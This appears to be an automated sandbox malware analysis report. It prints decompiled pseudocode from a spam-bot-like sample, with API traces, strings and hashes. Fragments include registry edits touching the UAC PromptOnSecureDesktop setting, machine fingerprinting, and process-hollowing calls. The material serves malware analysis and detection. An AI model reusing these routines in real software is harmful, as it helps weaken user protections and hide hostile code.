0x0040e1de
0x0040e1c8
0x0040e1c3
0x0040e227
0x0040e310
0x00000000
0x0040e311
0x0040e237
0x0040e23c
0x0040e241
0x00000000
0x0040e251
0x0040e25c
0x0040e278
0x0040e29e
0x0040e2a3
0x0040e2a8
0x0040e2eb
0x0040e2eb
0x0040e2f2
0x0040e2fb
0x0040e308
0x00000000
0x0040e30d
0x0040e2be
0x0040e2df
0x0040e2e4
0x0040e2e9
0x00000000
0x00000000
0x00000000
0x0040e2e9
0x0040e241
0x0040e186
0x0040e187
0x0040e18d
0x00000000
0x00000000
0x00000000

APIs

WriteFile.KERNEL32(00000001,0040DAE0,00000000,00000000,00000000), ref: 0040E209
CloseHandle.KERNEL32(00000001,00000003), ref: 0040E21D

Part of subcall function 0040E095: RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
Part of subcall function 0040E095: RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
Part of subcall function 0040E095: RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
Part of subcall function 0040E095: RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161

Strings

PromptOnSecureDesktop, xrefs: 0040E28A, 0040E28F, 0040E2D0, 0040E2FA

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CloseValue$CreateDeleteFileHandleWrite
String ID: PromptOnSecureDesktop
API String ID: 4151426672-2980165447
Opcode ID: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
Instruction ID: b34283ca0245a4d5345772c7626065eb71a791ff6ac24fd5689ebe733b27dfc9
Opcode Fuzzy Hash: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
Instruction Fuzzy Hash: 5D41DB71940214BADB205E938C06FDB3F6CEB44754F1084BEFA09B41D2E6B99A60D6BD

Uniqueness

Uniqueness Score: -1.00%

Function 00408CEE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;

				_push(_t34);
				_t31 = 0;
				if( *0x413380 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x413388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x413380;
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x413388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
					goto L16;
				}
			}

0x00408cf2
0x00408cf4
0x00408cfc
0x00408dae
0x00408db0
0x00408db0
0x00408d08
0x00408d13
0x00000000
0x00000000
0x00408d1b
0x00408d21
0x00408d24
0x00408d27
0x00408d2a
0x00408d2f
0x00408da1
0x00408da1
0x00408da8
0x00000000
0x00408d31
0x00408d31
0x00408d34
0x00408d37
0x00408d3c
0x00408d50
0x00408d6c
0x00408d6f
0x00408d78
0x00000000
0x00000000
0x00408d7a
0x00408d7d
0x00408d8b
0x00408d8b
0x00408d90
0x00408d9e
0x00408da0
0x00000000
0x00408d90
0x00000000
0x00408d7d
0x00408d5a
0x00408d5f
0x00408d62
0x00408d67
0x00408d67
0x00408d67
0x00000000
0x00408d62
0x00408d46
0x00000000
0x00408d7f
0x00408d7f
0x00408d83
0x00408d84
0x00000000
0x00408d89

APIs

GetTickCount.KERNEL32 ref: 00408D02
GetTickCount.KERNEL32 ref: 00408DA1

Strings

localcfg, xrefs: 00408D19

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: localcfg
API String ID: 536389180-1857712256
Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFCE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040BFD0
wsprintfA.USER32 ref: 0040C060

Strings

Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CountTickwsprintf
String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
API String ID: 2424974917-1012700906
Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50

Uniqueness

Uniqueness Score: -1.00%

Function 004038F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t29;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;
				}
				_t29 = E004030FA(0x412c00);
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x412c00 =  *0x412c00 & 0x00000000;
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x412bfc == 0) {
									E00406509(_t34);
									 *0x412bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}

0x004038fa
0x00403989
0x0040398b
0x0040398b
0x00403905
0x0040390b
0x00403911
0x00403982
0x00403982
0x00000000
0x00403913
0x0040391b
0x00403924
0x00403926
0x0040392e
0x00403930
0x00403930
0x00403933
0x00403935
0x00403935
0x0040393b
0x0040393b
0x0040393e
0x00403947
0x0040394b
0x0040394c
0x0040394f
0x00403952
0x00403958
0x0040395a
0x00403964
0x00403966
0x0040396b
0x0040396b
0x00403964
0x00403958
0x00403975
0x00403978
0x0040397b
0x00000000
0x00403981

APIs

Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128

GetCurrentThreadId.KERNEL32 ref: 00403929
GetCurrentThreadId.KERNEL32 ref: 00403939

Strings

%FROM_EMAIL, xrefs: 00403913

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CurrentThread$CountExchangeInterlockedTick
String ID: %FROM_EMAIL
API String ID: 3716169038-2903620461
Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00401AC3();
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0040ECA5() & 0x7fffffff;
				}
				return _t28;
			}

0x00401b7e
0x00401b84
0x00401b85
0x00401b86
0x00401b87
0x00401b89
0x00401b8c
0x00401b8d
0x00401b94
0x00401ba3
0x00401bb8
0x00401bc8
0x00401bca
0x00401bcd
0x00000000
0x00401bd8
0x00000000

APIs

Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9

GetComputerNameA.KERNEL32 ref: 00401BA3
GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8

Strings

localcfg, xrefs: 00401B7B

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: AddressComputerInformationLibraryLoadNameProcVolume
String ID: localcfg
API String ID: 2777991786-1857712256
Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_push(0x413640);
							} else {
								_push(0x41363c);
							}
							_t17 = InterlockedIncrement();
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17;
				}
				return _t15;
			}

0x0040ab85
0x0040ab8a
0x0040ab94
0x0040ab97
0x0040ab9a
0x0040aba0
0x0040abab
0x0040abb9
0x0040abc4
0x0040abca
0x0040abd3
0x0040abdc
0x0040abd5
0x0040abd5
0x0040abd5
0x0040abe1
0x0040abe1
0x0040abe3
0x0040abe4
0x00000000
0x0040abea
0x0040abed

APIs

lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1

Strings

%FROM_EMAIL, xrefs: 0040AB8C

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: IncrementInterlockedlstrcpyn
String ID: %FROM_EMAIL
API String ID: 224340156-2903620461
Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004026B2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
inet_ntoa.WS2_32(?), ref: 004026E4

Strings

localcfg, xrefs: 004026CD, 004026D2, 004026DE

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: gethostbyaddrinet_ntoa
String ID: localcfg
API String ID: 2112563974-1857712256
Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAE4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x4136f4;
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x4136f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}

0x0040eae4
0x0040eaeb
0x0040eb02
0x0040eb0d
0x0040eaed
0x0040eaf2
0x0040eaf8
0x0040eaff
0x00000000
0x0040eb01
0x0040eb01
0x0040eb01
0x0040eaff

APIs

LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,73AFF210,80000001,00000000), ref: 0040EAF2
GetProcAddress.KERNEL32(?,00000000), ref: 0040EB07

Strings

ntdll.dll, xrefs: 0040EAED

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: ntdll.dll
API String ID: 2574300362-2227199552
Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C

Uniqueness

Uniqueness Score: -1.00%

Function 00402F22, Relevance: 5.2, APIs: 4, Instructions: 157
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E00402D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0040EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
								E0040EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

0x00402f2e
0x00402f34
0x00402f36
0x00402f3d
0x00402f42
0x00402f4d
0x00402f88
0x00402f8b
0x00402f8e
0x00402f93
0x00402f93
0x00402f96
0x00402f98
0x00402f9b
0x00402f9e
0x00402f9e
0x00402fa0
0x00402fa1
0x00402fae
0x00402fb3
0x00402fb7
0x00402fbe
0x00402fc1
0x00402fc3
0x00402fc5
0x00402fca
0x00402fcd
0x00000000
0x00000000
0x00000000
0x00402fcd
0x00402fdb
0x00402fe3
0x00402fe8
0x004030ad
0x00000000
0x004030af
0x00402ff3
0x00402ff4
0x00402ff7
0x00402ff9
0x00402ffd
0x00403001
0x00403017
0x0040301a
0x00403021
0x00403028
0x0040302b
0x0040302e
0x00403031
0x00403034
0x00403034
0x00403036
0x00403037
0x00403049
0x00403051
0x00403054
0x00403057
0x00403059
0x0040305c
0x0040305c
0x0040305e
0x0040305f
0x0040306b
0x00403070
0x00403076
0x00403079
0x0040307c
0x0040307c
0x0040307e
0x0040307f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403003
0x00403003
0x0040300d
0x0040300f
0x0040300f
0x0040300f
0x00403012
0x00403013
0x00000000
0x00403083
0x0040308f
0x00403094
0x0040309d
0x004030a0
0x004030a3
0x004030a4
0x00000000
0x00402ff7
0x00402f4f
0x00402f4f
0x00402f52
0x00402f54
0x00402f54
0x00402f57
0x00402f57
0x00402f59
0x00402f5a
0x00402f66
0x00402f6e
0x00402f7a
0x00000000
0x00402f7a
0x00000000

APIs

Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,73BCEA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
HeapFree.KERNEL32(00000000), ref: 00402F7A

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Heap$FreeHandleLibraryLoadModuleProcess
String ID:
API String ID: 1017166417-0
Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 8EC4.exe PID: 6024 Parent PID: 3424 8EC4.exeCOMMON

Executed Functions

Function 0599F6A0, Relevance: 1.6, APIs: 1, Instructions: 61
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0599F723

Memory Dump Source

Source File: 00000016.00000002.830804509.0000000005990000.00000040.00000001.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5990000_8EC4.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a330798e41973e9b9ecab3e9834a8faab0a3aadbb56c9bc4dedfe7f2bf731aec
Instruction ID: d9fceed3abb2604ada917d13a1c8cc41934d84ccdea8da1934ad6d0b0bd05efe
Opcode Fuzzy Hash: a330798e41973e9b9ecab3e9834a8faab0a3aadbb56c9bc4dedfe7f2bf731aec
Instruction Fuzzy Hash: DA2123B5D002099FCF10DFAAD884ADEFBF5FF48314F14842AE919A7210CB789954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0599F5C0, Relevance: 1.6, APIs: 1, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL(?,?), ref: 0599F625

Memory Dump Source

Source File: 00000016.00000002.830804509.0000000005990000.00000040.00000001.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5990000_8EC4.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: de128d693baa92c54b5c813215d752e5f609c7a680c070bb033c3f8a8fd52602
Instruction ID: 1435729e9f55f4d3293ae36a8088cd938cc5a65c4e88bc3dfbb99601931f11c7
Opcode Fuzzy Hash: de128d693baa92c54b5c813215d752e5f609c7a680c070bb033c3f8a8fd52602
Instruction Fuzzy Hash: DA1146B1D003488FCB10DFAAD8447DFFBF5AF88324F24842AD416A7650CB79A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 032CDE18, Relevance: .5, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.825975538.00000000032C0000.00000040.00000001.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32c0000_8EC4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1550dd90129c5c4f3b09d6de23b676e5d4a0115e3bfc31fddfe0226cceb96dc2
Instruction ID: 59119d0e553a3146a4e230d07c35dfea6b72bf325d6f068a4bc8cc9369cb6be0
Opcode Fuzzy Hash: 1550dd90129c5c4f3b09d6de23b676e5d4a0115e3bfc31fddfe0226cceb96dc2
Instruction Fuzzy Hash: 02F1C335B212559FCB25DB64C84467EBAB6EF88B11F1A812DE906DB344CBB4CC81CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 032CB490, Relevance: 1.7, Strings: 1, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+\, xrefs: 032CB51B

Memory Dump Source

Source File: 00000016.00000002.825975538.00000000032C0000.00000040.00000001.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32c0000_8EC4.jbxd

Similarity

API ID:
String ID: +\
API String ID: 0-4036785194
Opcode ID: 25dc87804c3988bc20fc1dd404b0627256d8c9aa095472b97193300fc26ff3f2
Instruction ID: 98dfeaa94a0f92bc9daf42a6b2a5a8e8a1dfac420a9ad8c034ae45aa71380255
Opcode Fuzzy Hash: 25dc87804c3988bc20fc1dd404b0627256d8c9aa095472b97193300fc26ff3f2
Instruction Fuzzy Hash: 1DE1BF34B2464A8BCB10DFA9D551A5EB3E2FF84B44B25862DDA06DB354EF30DC81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0599D748, Relevance: 1.6, APIs: 1, Instructions: 145
processCOMMON

Download Yara Rule

